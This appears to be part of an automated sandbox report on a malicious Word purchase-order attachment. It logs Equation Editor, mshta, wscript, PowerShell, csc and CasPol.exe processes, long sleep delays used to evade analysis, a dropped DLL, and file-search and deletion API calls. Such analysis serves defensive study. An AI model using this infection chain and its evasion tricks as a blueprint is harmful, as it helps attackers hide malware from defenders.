                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\SysWOW64\wscript.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\SysWOW64\wscript.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\SysWOW64\wscript.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\SysWOW64\wscript.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\SysWOW64\wscript.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeProcess information set: NOOPENFILEERRORBOX
                  Source: PO NAHK22012FA00000.docx.doc Stream path 'CONTENTS' entropy: 7.9803126268 (max. 8.0)
                  Source: PO NAHK22012FA00000.docx.doc Stream path 'CONTENTS' entropy: 7.94760038357 (max. 8.0)
                  Source: ~WRF{DE8BB6AA-6431-42DF-A763-75296C786D33}.tmp.0.dr Stream path '_1791187948/CONTENTS' entropy: 7.94760038357 (max. 8.0)
                  Source: ~WRF{DE8BB6AA-6431-42DF-A763-75296C786D33}.tmp.0.dr Stream path '_1791187949/CONTENTS' entropy: 7.9803126268 (max. 8.0)
                  Source: ~WRD0000.tmp.0.dr Stream path 'CONTENTS' entropy: 7.94760038357 (max. 8.0)
                  Source: ~WRD0000.tmp.0.dr Stream path 'CONTENTS' entropy: 7.9803126268 (max. 8.0)

                  Malware Analysis System Evasion

                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe Code function: 20_2_0040F7E2 Sleep,ExitProcess, 20_2_0040F7E2
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe Code function: 22_2_0040DD85 memset,CreateFileW,NtQuerySystemInformation,CloseHandle,GetCurrentProcessId,_wcsicmp,_wcsicmp,_wcsicmp,OpenProcess,GetCurrentProcess,DuplicateHandle,memset,CloseHandle,_wcsicmp,CloseHandle, 22_2_0040DD85
                  Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE Code function: 8_2_008E5F52 sldt word ptr [eax] 8_2_008E5F52
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe Code function: OpenSCManagerA,EnumServicesStatusW,GetLastError,EnumServicesStatusW,OpenServiceW,QueryServiceConfigW,GetLastError,QueryServiceConfigW,CloseServiceHandle,CloseServiceHandle, 20_2_0041A7D9
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Thread delayed: delay time: 922337203685477
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Thread delayed: delay time: 600000
                  Source: C:\Windows\SysWOW64\wscript.exe Window found: window name: WSH-Timer
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Window / User API: threadDelayed 3304
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Window / User API: threadDelayed 1310
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Window / User API: threadDelayed 2051
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Window / User API: threadDelayed 5290
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Window / User API: threadDelayed 396
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Window / User API: threadDelayed 2345
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Window / User API: threadDelayed 8281
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Window / User API: threadDelayed 1609
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe Window / User API: threadDelayed 2567
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe Window / User API: threadDelayed 6964
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe Window / User API: foregroundWindowGot 1696
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe Decision node followed by non-executed suspicious API: DecisionNode, Non Executed (send or recv or WinExec) graph_20-53641
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe Dropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\j0qjax5r\j0qjax5r.dll
                  Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE TID: 3984 Thread sleep time: -360000s >= -30000s
                  Source: C:\Windows\SysWOW64\mshta.exe TID: 4088 Thread sleep time: -240000s >= -30000s
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe TID: 3032 Thread sleep time: -180000s >= -30000s
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe TID: 1368 Thread sleep time: -922337203685477s >= -30000s
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe TID: 3248 Thread sleep time: -922337203685477s >= -30000s
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe TID: 2576 Thread sleep count: 2051 > 30
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe TID: 2576 Thread sleep count: 5290 > 30
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe TID: 2084 Thread sleep time: -120000s >= -30000s
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe TID: 2120 Thread sleep time: -1844674407370954s >= -30000s
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe TID: 3044 Thread sleep time: -922337203685477s >= -30000s
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe TID: 2748 Thread sleep count: 396 > 30
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe TID: 2748 Thread sleep count: 2345 > 30
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe TID: 2844 Thread sleep time: -60000s >= -30000s
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe TID: 2108 Thread sleep time: -922337203685477s >= -30000s
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe TID: 1288Thread sleep count: 8281 > 30
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe TID: 1288Thread sleep count: 1609 > 30
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe TID: 3692Thread sleep time: -13835058055282155s >= -30000s
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe TID: 3668Thread sleep time: -60000s >= -30000s
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe TID: 3692Thread sleep time: -3000000s >= -30000s
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe TID: 680Thread sleep time: -30000s >= -30000s
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe TID: 2204Thread sleep count: 217 > 30
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe TID: 2204Thread sleep time: -108500s >= -30000s
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe TID: 2064Thread sleep count: 2567 > 30
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe TID: 2064Thread sleep time: -7701000s >= -30000s
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe TID: 3784Thread sleep time: -180000s >= -30000s
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe TID: 2064Thread sleep count: 6964 > 30
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe TID: 2064Thread sleep time: -20892000s >= -30000s
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe TID: 3828Thread sleep time: -120000s >= -30000s
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeCode function: 20_2_0040928E __EH_prolog,__CxxThrowException@8,FindFirstFileW,FindNextFileW,FindClose,FindClose,20_2_0040928E
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeCode function: 20_2_0041C322 FindFirstFileW,FindNextFileW,RemoveDirectoryW,SetFileAttributesW,DeleteFileW,GetLastError,FindClose,RemoveDirectoryW,FindClose,20_2_0041C322
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeCode function: 20_2_0040C388 FindFirstFileW,PathFileExistsW,FindNextFileW,FindClose,FindClose,20_2_0040C388
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeCode function: 20_2_004096A0 __EH_prolog,FindFirstFileW,FindNextFileW,FindClose,FindClose,20_2_004096A0
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeCode function: 20_2_00408847 __EH_prolog,FindFirstFileW,__CxxThrowException@8,FindNextFileW,FindClose,20_2_00408847
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeCode function: 20_2_00407877 FindFirstFileW,FindNextFileW,20_2_00407877
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeCode function: 20_2_0044E8F9 FindFirstFileExA,20_2_0044E8F9
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeCode function: 20_2_0040BB6B FindFirstFileA,FindClose,DeleteFileA,GetLastError,DeleteFileA,GetLastError,FindNextFileA,FindClose,20_2_0040BB6B
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeCode function: 20_2_00419B86 FindFirstFileW,FindNextFileW,FindNextFileW,20_2_00419B86
